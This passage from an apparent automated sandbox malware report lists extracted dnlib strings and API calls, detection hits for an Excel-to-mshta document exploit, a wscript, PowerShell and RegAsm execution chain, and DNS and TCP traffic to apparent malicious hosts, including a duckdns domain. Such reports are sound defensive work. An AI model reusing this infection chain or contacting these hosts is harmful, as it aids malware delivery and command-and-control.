                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdbhPB source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,28_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407877 FindFirstFileW,FindNextFileW,28_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044E8F9 FindFirstFileExA,28_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,28_2_00407CD2

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: ia803104.us.archive.org
                  Source: global trafficDNS query: name: cloudsave.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficDNS query: name: zhort.de
                  Source: global trafficDNS query: name: ia803104.us.archive.org
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 192.3.193.155:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
